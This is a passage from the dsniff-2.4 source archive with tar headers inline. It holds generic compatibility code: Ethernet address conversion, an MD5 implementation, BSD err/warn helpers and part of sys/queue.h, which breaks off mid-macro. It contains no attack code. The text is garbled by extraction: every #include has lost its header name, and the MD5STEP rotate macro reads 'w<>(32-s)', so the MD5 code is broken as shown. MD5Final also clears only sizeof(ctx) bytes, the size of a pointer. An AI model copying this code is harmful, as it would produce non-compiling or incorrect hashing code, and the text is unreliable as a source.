modified by Todd C. Miller */ #include #include #include #include #include #include #include #include #include #include char * ether_ntoa(e) struct ether_addr *e; { static char a[] = "xx:xx:xx:xx:xx:xx"; if (e->ether_addr_octet[0] > 0xFF || e->ether_addr_octet[1] > 0xFF || e->ether_addr_octet[2] > 0xFF || e->ether_addr_octet[3] > 0xFF || e->ether_addr_octet[4] > 0xFF || e->ether_addr_octet[5] > 0xFF) { errno = EINVAL; return (NULL); } (void)sprintf(a, "%02x:%02x:%02x:%02x:%02x:%02x", e->ether_addr_octet[0], e->ether_addr_octet[1], e->ether_addr_octet[2], e->ether_addr_octet[3], e->ether_addr_octet[4], e->ether_addr_octet[5]); return (a); } static char * _ether_aton(s, e) char *s; struct ether_addr *e; { int i; long l; char *pp; while (isspace(*s)) s++; /* expect 6 hex octets separated by ':' or space/NUL if last octet */ for (i = 0; i < 6; i++) { l = strtol(s, &pp, 16); if (pp == s || l > 0xFF || l < 0) return (NULL); if (!(*pp == ':' || (i == 5 && (isspace(*pp) || *pp == '\0')))) return (NULL); e->ether_addr_octet[i] = (u_char)l; s = pp + 1; } /* return character after the octets ala strtol(3) */ return (pp); } struct ether_addr * ether_aton(s) char *s; { static struct ether_addr n; return (_ether_aton(s, &n) ? &n : NULL); } dsniff-2.4/missing/md5.c0000600000175000017500000002774307204257540015012 0ustar lucianoluciano/* * This code implements the MD5 message-digest algorithm. * The algorithm is due to Ron Rivest. This code was * written by Colin Plumb in 1993, no copyright is claimed. * This code is in the public domain; do with it what you wish. * * Equivalent code is available from RSA Data Security, Inc. * This code has been tested against that, and is equivalent, * except that you don't need to include two pages of legalese * with every copy. * * To compute the message digest of a chunk of bytes, declare an * MD5Context structure, pass it to MD5Init, call MD5Update as * needed on buffers full of bytes, and then call MD5Final, which * will fill a supplied 16-byte array with the digest. */ #include "config.h" #include #include /* for memcpy() */ #include "md5.h" #ifndef HIGHFIRST #define byteReverse(buf, len) /* Nothing */ #else void byteReverse(unsigned char *buf, unsigned longs); #ifndef ASM_MD5 /* * Note: this code is harmless on little-endian machines. */ void byteReverse(unsigned char *buf, unsigned longs) { u_int32_t t; do { t = (u_int32_t) ((unsigned) buf[3] << 8 | buf[2]) << 16 | ((unsigned) buf[1] << 8 | buf[0]); *(u_int32_t *) buf = t; buf += 4; } while (--longs); } #endif #endif /* * Start MD5 accumulation. Set bit count to 0 and buffer to mysterious * initialization constants. */ void MD5Init(struct MD5Context *ctx) { ctx->buf[0] = 0x67452301; ctx->buf[1] = 0xefcdab89; ctx->buf[2] = 0x98badcfe; ctx->buf[3] = 0x10325476; ctx->bits[0] = 0; ctx->bits[1] = 0; } /* * Update context to reflect the concatenation of another buffer full * of bytes. */ void MD5Update(struct MD5Context *ctx, unsigned char const *buf, unsigned len) { u_int32_t t; /* Update bitcount */ t = ctx->bits[0]; if ((ctx->bits[0] = t + ((u_int32_t) len << 3)) < t) ctx->bits[1]++; /* Carry from low to high */ ctx->bits[1] += len >> 29; t = (t >> 3) & 0x3f; /* Bytes already in shsInfo->data */ /* Handle any leading odd-sized chunks */ if (t) { unsigned char *p = (unsigned char *) ctx->in + t; t = 64 - t; if (len < t) { memcpy(p, buf, len); return; } memcpy(p, buf, t); byteReverse(ctx->in, 16); MD5Transform(ctx->buf, (u_int32_t *) ctx->in); buf += t; len -= t; } /* Process data in 64-byte chunks */ while (len >= 64) { memcpy(ctx->in, buf, 64); byteReverse(ctx->in, 16); MD5Transform(ctx->buf, (u_int32_t *) ctx->in); buf += 64; len -= 64; } /* Handle any remaining bytes of data. */ memcpy(ctx->in, buf, len); } /* * Final wrapup - pad to 64-byte boundary with the bit pattern * 1 0* (64-bit count of bits processed, MSB-first) */ void MD5Final(unsigned char digest[16], struct MD5Context *ctx) { unsigned count; unsigned char *p; /* Compute number of bytes mod 64 */ count = (ctx->bits[0] >> 3) & 0x3F; /* Set the first char of padding to 0x80. This is safe since there is always at least one byte free */ p = ctx->in + count; *p++ = 0x80; /* Bytes of padding needed to make 64 bytes */ count = 64 - 1 - count; /* Pad out to 56 mod 64 */ if (count < 8) { /* Two lots of padding: Pad the first block to 64 bytes */ memset(p, 0, count); byteReverse(ctx->in, 16); MD5Transform(ctx->buf, (u_int32_t *) ctx->in); /* Now fill the next block with 56 bytes */ memset(ctx->in, 0, 56); } else { /* Pad block to 56 bytes */ memset(p, 0, count - 8); } byteReverse(ctx->in, 14); /* Append length in bits and transform */ ((u_int32_t *) ctx->in)[14] = ctx->bits[0]; ((u_int32_t *) ctx->in)[15] = ctx->bits[1]; MD5Transform(ctx->buf, (u_int32_t *) ctx->in); byteReverse((unsigned char *) ctx->buf, 4); memcpy(digest, ctx->buf, 16); memset(ctx, 0, sizeof(ctx)); /* In case it's sensitive */ } #ifndef ASM_MD5 /* The four core functions - F1 is optimized somewhat */ /* #define F1(x, y, z) (x & y | ~x & z) */ #define F1(x, y, z) (z ^ (x & (y ^ z))) #define F2(x, y, z) F1(z, x, y) #define F3(x, y, z) (x ^ y ^ z) #define F4(x, y, z) (y ^ (x | ~z)) /* This is the central step in the MD5 algorithm. */ #ifdef __PUREC__ #define MD5STEP(f, w, x, y, z, data, s) \ ( w += f /*(x, y, z)*/ + data, w = w<>(32-s), w += x ) #else #define MD5STEP(f, w, x, y, z, data, s) \ ( w += f(x, y, z) + data, w = w<>(32-s), w += x ) #endif /* * The core of the MD5 algorithm, this alters an existing MD5 hash to * reflect the addition of 16 longwords of new data. MD5Update blocks * the data and converts bytes into longwords for this routine. */ void MD5Transform(u_int32_t buf[4], u_int32_t const in[16]) { register u_int32_t a, b, c, d; a = buf[0]; b = buf[1]; c = buf[2]; d = buf[3]; #ifdef __PUREC__ /* PureC Weirdness... (GG) */ MD5STEP(F1(b,c,d), a, b, c, d, in[0] + 0xd76aa478L, 7); MD5STEP(F1(a,b,c), d, a, b, c, in[1] + 0xe8c7b756L, 12); MD5STEP(F1(d,a,b), c, d, a, b, in[2] + 0x242070dbL, 17); MD5STEP(F1(c,d,a), b, c, d, a, in[3] + 0xc1bdceeeL, 22); MD5STEP(F1(b,c,d), a, b, c, d, in[4] + 0xf57c0fafL, 7); MD5STEP(F1(a,b,c), d, a, b, c, in[5] + 0x4787c62aL, 12); MD5STEP(F1(d,a,b), c, d, a, b, in[6] + 0xa8304613L, 17); MD5STEP(F1(c,d,a), b, c, d, a, in[7] + 0xfd469501L, 22); MD5STEP(F1(b,c,d), a, b, c, d, in[8] + 0x698098d8L, 7); MD5STEP(F1(a,b,c), d, a, b, c, in[9] + 0x8b44f7afL, 12); MD5STEP(F1(d,a,b), c, d, a, b, in[10] + 0xffff5bb1L, 17); MD5STEP(F1(c,d,a), b, c, d, a, in[11] + 0x895cd7beL, 22); MD5STEP(F1(b,c,d), a, b, c, d, in[12] + 0x6b901122L, 7); MD5STEP(F1(a,b,c), d, a, b, c, in[13] + 0xfd987193L, 12); MD5STEP(F1(d,a,b), c, d, a, b, in[14] + 0xa679438eL, 17); MD5STEP(F1(c,d,a), b, c, d, a, in[15] + 0x49b40821L, 22); MD5STEP(F2(b,c,d), a, b, c, d, in[1] + 0xf61e2562L, 5); MD5STEP(F2(a,b,c), d, a, b, c, in[6] + 0xc040b340L, 9); MD5STEP(F2(d,a,b), c, d, a, b, in[11] + 0x265e5a51L, 14); MD5STEP(F2(c,d,a), b, c, d, a, in[0] + 0xe9b6c7aaL, 20); MD5STEP(F2(b,c,d), a, b, c, d, in[5] + 0xd62f105dL, 5); MD5STEP(F2(a,b,c), d, a, b, c, in[10] + 0x02441453L, 9); MD5STEP(F2(d,a,b), c, d, a, b, in[15] + 0xd8a1e681L, 14); MD5STEP(F2(c,d,a), b, c, d, a, in[4] + 0xe7d3fbc8L, 20); MD5STEP(F2(b,c,d), a, b, c, d, in[9] + 0x21e1cde6L, 5); MD5STEP(F2(a,b,c), d, a, b, c, in[14] + 0xc33707d6L, 9); MD5STEP(F2(d,a,b), c, d, a, b, in[3] + 0xf4d50d87L, 14); MD5STEP(F2(c,d,a), b, c, d, a, in[8] + 0x455a14edL, 20); MD5STEP(F2(b,c,d), a, b, c, d, in[13] + 0xa9e3e905L, 5); MD5STEP(F2(a,b,c), d, a, b, c, in[2] + 0xfcefa3f8L, 9); MD5STEP(F2(d,a,b), c, d, a, b, in[7] + 0x676f02d9L, 14); MD5STEP(F2(c,d,a), b, c, d, a, in[12] + 0x8d2a4c8aL, 20); MD5STEP(F3(b,c,d), a, b, c, d, in[5] + 0xfffa3942L, 4); MD5STEP(F3(a,b,c), d, a, b, c, in[8] + 0x8771f681L, 11); MD5STEP(F3(d,a,b), c, d, a, b, in[11] + 0x6d9d6122L, 16); MD5STEP(F3(c,d,a), b, c, d, a, in[14] + 0xfde5380cL, 23); MD5STEP(F3(b,c,d), a, b, c, d, in[1] + 0xa4beea44L, 4); MD5STEP(F3(a,b,c), d, a, b, c, in[4] + 0x4bdecfa9L, 11); MD5STEP(F3(d,a,b), c, d, a, b, in[7] + 0xf6bb4b60L, 16); MD5STEP(F3(c,d,a), b, c, d, a, in[10] + 0xbebfbc70L, 23); MD5STEP(F3(b,c,d), a, b, c, d, in[13] + 0x289b7ec6L, 4); MD5STEP(F3(a,b,c), d, a, b, c, in[0] + 0xeaa127faL, 11); MD5STEP(F3(d,a,b), c, d, a, b, in[3] + 0xd4ef3085L, 16); MD5STEP(F3(c,d,a), b, c, d, a, in[6] + 0x04881d05L, 23); MD5STEP(F3(b,c,d), a, b, c, d, in[9] + 0xd9d4d039L, 4); MD5STEP(F3(a,b,c), d, a, b, c, in[12] + 0xe6db99e5L, 11); MD5STEP(F3(d,a,b), c, d, a, b, in[15] + 0x1fa27cf8L, 16); MD5STEP(F3(c,d,a), b, c, d, a, in[2] + 0xc4ac5665L, 23); MD5STEP(F4(b,c,d), a, b, c, d, in[0] + 0xf4292244L, 6); MD5STEP(F4(a,b,c), d, a, b, c, in[7] + 0x432aff97L, 10); MD5STEP(F4(d,a,b), c, d, a, b, in[14] + 0xab9423a7L, 15); MD5STEP(F4(c,d,a), b, c, d, a, in[5] + 0xfc93a039L, 21); MD5STEP(F4(b,c,d), a, b, c, d, in[12] + 0x655b59c3L, 6); MD5STEP(F4(a,b,c), d, a, b, c, in[3] + 0x8f0ccc92L, 10); MD5STEP(F4(d,a,b), c, d, a, b, in[10] + 0xffeff47dL, 15); MD5STEP(F4(c,d,a), b, c, d, a, in[1] + 0x85845dd1L, 21); MD5STEP(F4(b,c,d), a, b, c, d, in[8] + 0x6fa87e4fL, 6); MD5STEP(F4(a,b,c), d, a, b, c, in[15] + 0xfe2ce6e0L, 10); MD5STEP(F4(d,a,b), c, d, a, b, in[6] + 0xa3014314L, 15); MD5STEP(F4(c,d,a), b, c, d, a, in[13] + 0x4e0811a1L, 21); MD5STEP(F4(b,c,d), a, b, c, d, in[4] + 0xf7537e82L, 6); MD5STEP(F4(a,b,c), d, a, b, c, in[11] + 0xbd3af235L, 10); MD5STEP(F4(d,a,b), c, d, a, b, in[2] + 0x2ad7d2bbL, 15); MD5STEP(F4(c,d,a), b, c, d, a, in[9] + 0xeb86d391L, 21); #else MD5STEP(F1, a, b, c, d, in[0] + 0xd76aa478, 7); MD5STEP(F1, d, a, b, c, in[1] + 0xe8c7b756, 12); MD5STEP(F1, c, d, a, b, in[2] + 0x242070db, 17); MD5STEP(F1, b, c, d, a, in[3] + 0xc1bdceee, 22); MD5STEP(F1, a, b, c, d, in[4] + 0xf57c0faf, 7); MD5STEP(F1, d, a, b, c, in[5] + 0x4787c62a, 12); MD5STEP(F1, c, d, a, b, in[6] + 0xa8304613, 17); MD5STEP(F1, b, c, d, a, in[7] + 0xfd469501, 22); MD5STEP(F1, a, b, c, d, in[8] + 0x698098d8, 7); MD5STEP(F1, d, a, b, c, in[9] + 0x8b44f7af, 12); MD5STEP(F1, c, d, a, b, in[10] + 0xffff5bb1, 17); MD5STEP(F1, b, c, d, a, in[11] + 0x895cd7be, 22); MD5STEP(F1, a, b, c, d, in[12] + 0x6b901122, 7); MD5STEP(F1, d, a, b, c, in[13] + 0xfd987193, 12); MD5STEP(F1, c, d, a, b, in[14] + 0xa679438e, 17); MD5STEP(F1, b, c, d, a, in[15] + 0x49b40821, 22); MD5STEP(F2, a, b, c, d, in[1] + 0xf61e2562, 5); MD5STEP(F2, d, a, b, c, in[6] + 0xc040b340, 9); MD5STEP(F2, c, d, a, b, in[11] + 0x265e5a51, 14); MD5STEP(F2, b, c, d, a, in[0] + 0xe9b6c7aa, 20); MD5STEP(F2, a, b, c, d, in[5] + 0xd62f105d, 5); MD5STEP(F2, d, a, b, c, in[10] + 0x02441453, 9); MD5STEP(F2, c, d, a, b, in[15] + 0xd8a1e681, 14); MD5STEP(F2, b, c, d, a, in[4] + 0xe7d3fbc8, 20); MD5STEP(F2, a, b, c, d, in[9] + 0x21e1cde6, 5); MD5STEP(F2, d, a, b, c, in[14] + 0xc33707d6, 9); MD5STEP(F2, c, d, a, b, in[3] + 0xf4d50d87, 14); MD5STEP(F2, b, c, d, a, in[8] + 0x455a14ed, 20); MD5STEP(F2, a, b, c, d, in[13] + 0xa9e3e905, 5); MD5STEP(F2, d, a, b, c, in[2] + 0xfcefa3f8, 9); MD5STEP(F2, c, d, a, b, in[7] + 0x676f02d9, 14); MD5STEP(F2, b, c, d, a, in[12] + 0x8d2a4c8a, 20); MD5STEP(F3, a, b, c, d, in[5] + 0xfffa3942, 4); MD5STEP(F3, d, a, b, c, in[8] + 0x8771f681, 11); MD5STEP(F3, c, d, a, b, in[11] + 0x6d9d6122, 16); MD5STEP(F3, b, c, d, a, in[14] + 0xfde5380c, 23); MD5STEP(F3, a, b, c, d, in[1] + 0xa4beea44, 4); MD5STEP(F3, d, a, b, c, in[4] + 0x4bdecfa9, 11); MD5STEP(F3, c, d, a, b, in[7] + 0xf6bb4b60, 16); MD5STEP(F3, b, c, d, a, in[10] + 0xbebfbc70, 23); MD5STEP(F3, a, b, c, d, in[13] + 0x289b7ec6, 4); MD5STEP(F3, d, a, b, c, in[0] + 0xeaa127fa, 11); MD5STEP(F3, c, d, a, b, in[3] + 0xd4ef3085, 16); MD5STEP(F3, b, c, d, a, in[6] + 0x04881d05, 23); MD5STEP(F3, a, b, c, d, in[9] + 0xd9d4d039, 4); MD5STEP(F3, d, a, b, c, in[12] + 0xe6db99e5, 11); MD5STEP(F3, c, d, a, b, in[15] + 0x1fa27cf8, 16); MD5STEP(F3, b, c, d, a, in[2] + 0xc4ac5665, 23); MD5STEP(F4, a, b, c, d, in[0] + 0xf4292244, 6); MD5STEP(F4, d, a, b, c, in[7] + 0x432aff97, 10); MD5STEP(F4, c, d, a, b, in[14] + 0xab9423a7, 15); MD5STEP(F4, b, c, d, a, in[5] + 0xfc93a039, 21); MD5STEP(F4, a, b, c, d, in[12] + 0x655b59c3, 6); MD5STEP(F4, d, a, b, c, in[3] + 0x8f0ccc92, 10); MD5STEP(F4, c, d, a, b, in[10] + 0xffeff47d, 15); MD5STEP(F4, b, c, d, a, in[1] + 0x85845dd1, 21); MD5STEP(F4, a, b, c, d, in[8] + 0x6fa87e4f, 6); MD5STEP(F4, d, a, b, c, in[15] + 0xfe2ce6e0, 10); MD5STEP(F4, c, d, a, b, in[6] + 0xa3014314, 15); MD5STEP(F4, b, c, d, a, in[13] + 0x4e0811a1, 21); MD5STEP(F4, a, b, c, d, in[4] + 0xf7537e82, 6); MD5STEP(F4, d, a, b, c, in[11] + 0xbd3af235, 10); MD5STEP(F4, c, d, a, b, in[2] + 0x2ad7d2bb, 15); MD5STEP(F4, b, c, d, a, in[9] + 0xeb86d391, 21); #endif buf[0] += a; buf[1] += b; buf[2] += c; buf[3] += d; } #endif dsniff-2.4/missing/md5.h0000600000175000017500000000077407204257540015012 0ustar lucianoluciano#ifndef MD5_H #define MD5_H struct MD5Context { u_int32_t buf[4]; u_int32_t bits[2]; unsigned char in[64]; }; void MD5Init(struct MD5Context *context); void MD5Update(struct MD5Context *context, unsigned char const *buf, unsigned len); void MD5Final(unsigned char digest[16], struct MD5Context *context); void MD5Transform(u_int32_t buf[4], u_int32_t const in[16]); /* * This is needed to make RSAREF happy on some MS-DOS compilers. */ typedef struct MD5Context MD5_CTX; #endif /* !MD5_H */ dsniff-2.4/missing/err.c0000600000175000017500000000547607204257541015115 0ustar lucianoluciano/* * err.c * * Adapted from OpenBSD libc *err* *warn* code. * * Copyright (c) 2000 Dug Song * * Copyright (c) 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include #include #include #include #include void err(int eval, const char *fmt, ...) { va_list ap; va_start(ap, fmt); if (fmt != NULL) { (void)vfprintf(stderr, fmt, ap); (void)fprintf(stderr, ": "); } va_end(ap); (void)fprintf(stderr, "%s\n", strerror(errno)); exit(eval); } void warn(const char *fmt, ...) { va_list ap; va_start(ap, fmt); if (fmt != NULL) { (void)vfprintf(stderr, fmt, ap); (void)fprintf(stderr, ": "); } va_end(ap); (void)fprintf(stderr, "%s\n", strerror(errno)); } void errx(int eval, const char *fmt, ...) { va_list ap; va_start(ap, fmt); if (fmt != NULL) (void)vfprintf(stderr, fmt, ap); (void)fprintf(stderr, "\n"); va_end(ap); exit(eval); } void warnx(const char *fmt, ...) { va_list ap; va_start(ap, fmt); if (fmt != NULL) (void)vfprintf(stderr, fmt, ap); (void)fprintf(stderr, "\n"); va_end(ap); } dsniff-2.4/missing/err.h0000600000175000017500000000421607204257541015111 0ustar lucianoluciano/* * err.h * * Adapted from OpenBSD libc *err* *warn* code. * * Copyright (c) 2000 Dug Song * * Copyright (c) 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)err.h 8.1 (Berkeley) 6/2/93 */ #ifndef _ERR_H_ #define _ERR_H_ void err(int eval, const char *fmt, ...); void warn(const char *fmt, ...); void errx(int eval, const char *fmt, ...); void warnx(const char *fmt, ...); #endif /* !_ERR_H_ */ dsniff-2.4/missing/sys/0000755000175000017500000000000010522531320014756 5ustar lucianolucianodsniff-2.4/missing/sys/queue.h0000400000175000017500000004075107204257541016265 0ustar lucianoluciano/* $OpenBSD: queue.h,v 1.15 2000/04/15 00:20:13 deraadt Exp $ */ /* $NetBSD: queue.h,v 1.11 1996/05/16 05:17:14 mycroft Exp $ */ /* * Copyright (c) 1991, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)queue.h 8.5 (Berkeley) 8/20/94 */ #ifndef _SYS_QUEUE_H_ #define _SYS_QUEUE_H_ /* * This file defines five types of data structures: singly-linked lists, * lists, simple queues, tail queues, and circular queues. * * * A singly-linked list is headed by a single forward pointer. The elements * are singly linked for minimum space and pointer manipulation overhead at * the expense of O(n) removal for arbitrary elements. New elements can be * added to the list after an existing element or at the head of the list. * Elements being removed from the head of the list should use the explicit * macro for this purpose for optimum efficiency. A singly-linked list may * only be traversed in the forward direction. Singly-linked lists are ideal * for applications with large datasets and few or no removals or for * implementing a LIFO queue. * * A list is headed by a single forward pointer (or an array of forward * pointers for a hash table header). The elements are doubly linked * so that an arbitrary element can be removed without a need to * traverse the list. New elements can be added to the list before * or after an existing element or at the head of the list. A list * may only be traversed in the forward direction. * * A simple queue is headed by a pair of pointers, one the head of the * list and the other to the tail of the list. The elements are singly * linked to save space, so elements can only be removed from the * head of the list. New elements can be added to the list before or after * an existing element, at the head of the list, or at the end of the * list. A simple queue may only be traversed in the forward direction. * * A tail queue is headed by a pair of pointers, one to the head of the * list and the other to the tail of the list. The elements are doubly * linked so that an arbitrary element can be removed without a need to * traverse the list. New elements can be added to the list before or * after an existing element, at the head of the list, or at the end of * the list. A tail queue may be traversed in either direction. * * A circle queue is headed by a pair of pointers, one to the head of the * list and the other to the tail of the list. The elements are doubly * linked so that an arbitrary element can be removed without a need to * traverse the list. New elements can be added to the list before or after * an existing element, at the head of the list, or at the end of the list. * A circle queue may be traversed in either direction, but has a more * complex end of list detection. * * For details on the use of these macros, see the queue(3) manual page. */ /* * Singly-linked List definitions. */ #define SLIST_HEAD(name, type) \ struct name { \ struct type *slh_first; /* first element */ \ } #define SLIST_HEAD_INITIALIZER(head) \ { NULL } #define SLIST_ENTRY(type) \ struct { \ struct type *sle_next; /* next element */ \ } /* * Singly-linked List access methods. */ #define SLIST_FIRST(head) ((head)->slh_first) #define SLIST_END(head) NULL #define SLIST_EMPTY(head) (SLIST_FIRST(head) == SLIST_END(head)) #define SLIST_NEXT(elm, field) ((elm)->field.sle_next) #define SLIST_FOREACH(var, head, field) \ for((var) = SLIST_FIRST(head); \ (var) != SLIST_END(head); \ (var) = SLIST_NEXT(var, field)) /* * Singly-linked List functions. */ #define SLIST_INIT(head) { \ SLIST_FIRST(head) = SLIST_END(head); \ } #define SLIST_INSERT_AFTER(slistelm, elm, field) do { \ (elm)->field.sle_next = (slistelm)->field.sle_next; \ (slistelm)->field.sle_next = (elm); \ } while (0) #define SLIST_INSERT_HEAD(head, elm, field) do { \ (elm)->field.sle_next = (head)->slh_first; \ (head)->slh_first = (elm); \ } while (0) #define SLIST_REMOVE_HEAD(head, field) do { \ (head)->slh_first = (head)->slh_first->field.sle_next; \ } while (0) /* * List definitions. */ #define LIST_HEAD(name, type) \ struct name { \ struct type *lh_first; /* first element */ \ } #define LIST_HEAD_INITIALIZER(head) \ { NULL } #define LIST_ENTRY(type) \ struct { \ struct type *le_next; /* next element */ \ struct type **le_prev; /* address of previous next element */ \ } /* * List access methods */ #define LIST_FIRST(head) ((head)->lh_first) #define LIST_END(head) NULL #define LIST_EMPTY(head) (LIST_FIRST(head) == LIST_END(head)) #define LIST_NEXT(elm, field) ((elm)->field.le_next) #define LIST_FOREACH(var, head, field) \ for((var) = LIST_FIRST(head); \ (var)!= LIST_END(head); \ (var) = LIST_NEXT(var, field)) /* * List functions. */ #define LIST_INIT(head) do { \ LIST_FIRST(head) = LIST_END(head); \ } while (0) #define LIST_INSERT_AFTER(listelm, elm, field) do { \ if (((elm)->field.le_next = (listelm)->field.le_next) != NULL) \ (listelm)->field.le_next->field.le_prev = \ &(elm)->field.le_next; \ (listelm)->field.le_next = (elm); \ (elm)->field.le_prev = &(listelm)->field.le_next; \ } while (0) #define LIST_INSERT_BEFORE(listelm, elm, field) do { \ (elm)->field.le_prev = (listelm)->field.le_prev; \ (elm)->field.le_next = (listelm); \ *(listelm)->field.le_prev = (elm); \ (listelm)->field.le_prev = &(elm)->field.le_next; \ } while (0) #define LIST_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.le_next = (head)->lh_first) != NULL) \ (head)->lh_first->field.le_prev = &(elm)->field.le_next;\ (head)->lh_first = (elm); \ (elm)->field.le_prev = &(head)->lh_first; \ } while (0) #define LIST_REMOVE(elm, field) do { \ if ((elm)->field.le_next != NULL) \ (elm)->field.le_next->field.le_prev = \ (elm)->field.le_prev; \ *(elm)->field.le_prev = (elm)->field.le_next; \ } while (0) #define LIST_REPLACE(elm, elm2, field) do { \ if (((elm2)->field.le_next = (elm)->field.le_next) != NULL) \ (elm2)->field.le_next->field.le_prev = \ &(elm2)->field.le_next; \ (elm2)->field.le_prev = (elm)->field.le_prev; \ *(elm2)->field.le_prev = (elm2); \ } while (0) /* * Simple queue definitions. */ #define SIMPLEQ_HEAD(name, type) \ struct name { \ struct type *sqh_first; /* first element */ \ struct type **sqh_last; /* addr of last next element */ \ } #define SIMPLEQ_HEAD_INITIALIZER(head) \ { NULL, &(head).sqh_first } #define SIMPLEQ_ENTRY(type) \ struct { \ struct type *sqe_next; /* next element */ \ } /* * Simple queue access methods. */ #define SIMPLEQ_FIRST(head) ((head)->sqh_first) #define SIMPLEQ_END(head) NULL #define SIMPLEQ_EMPTY(head) (SIMPLEQ_FIRST(head) == SIMPLEQ_END(head)) #define SIMPLEQ_NEXT(elm, field) ((elm)->field.sqe_next) #define SIMPLEQ_FOREACH(var, head, field) \ for((var) = SIMPLEQ_FIRST(head); \ (var) != SIMPLEQ_END(head); \ (var) = SIMPLEQ_NEXT(var, field)) /* * Simple queue functions. */ #define SIMPLEQ_INIT(head) do { \ (head)->sqh_first = NULL; \ (head)->sqh_last = &(head)->sqh_first; \ } while (0) #define SIMPLEQ_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.sqe_next = (head)->sqh_first) == NULL) \ (head)->sqh_last = &(elm)->field.sqe_next; \ (head)->sqh_first = (elm); \ } while (0) #define SIMPLEQ_INSERT_TAIL(head, elm, field) do { \ (elm)->field.sqe_next = NULL; \ *(head)->sqh_last = (elm); \ (head)->sqh_last = &(elm)->field.sqe_next; \ } while (0) #define SIMPLEQ_INSERT_AFTER(head, listelm, elm, field) do { \ if (((elm)->field.sqe_next = (listelm)->field.sqe_next) == NULL)\ (head)->sqh_last = &(elm)->field.sqe_next; \ (listelm)->field.sqe_next = (elm); \ } while (0) #define SIMPLEQ_REMOVE_HEAD(head, elm, field) do { \ if (((head)->sqh_first = (elm)->field.sqe_next) == NULL) \ (head)->sqh_last = &(head)->sqh_first; \ } while (0) /* * Tail queue definitions. */ #define TAILQ_HEAD(name, type) \ struct name { \ struct type *tqh_first; /* first element */ \ struct type **tqh_last; /* addr of last next element */ \ } #define TAILQ_HEAD_INITIALIZER(head) \ { NULL, &(head).tqh_first } #define TAILQ_ENTRY(type) \ struct { \ struct type *tqe_next; /* next element */ \ struct type 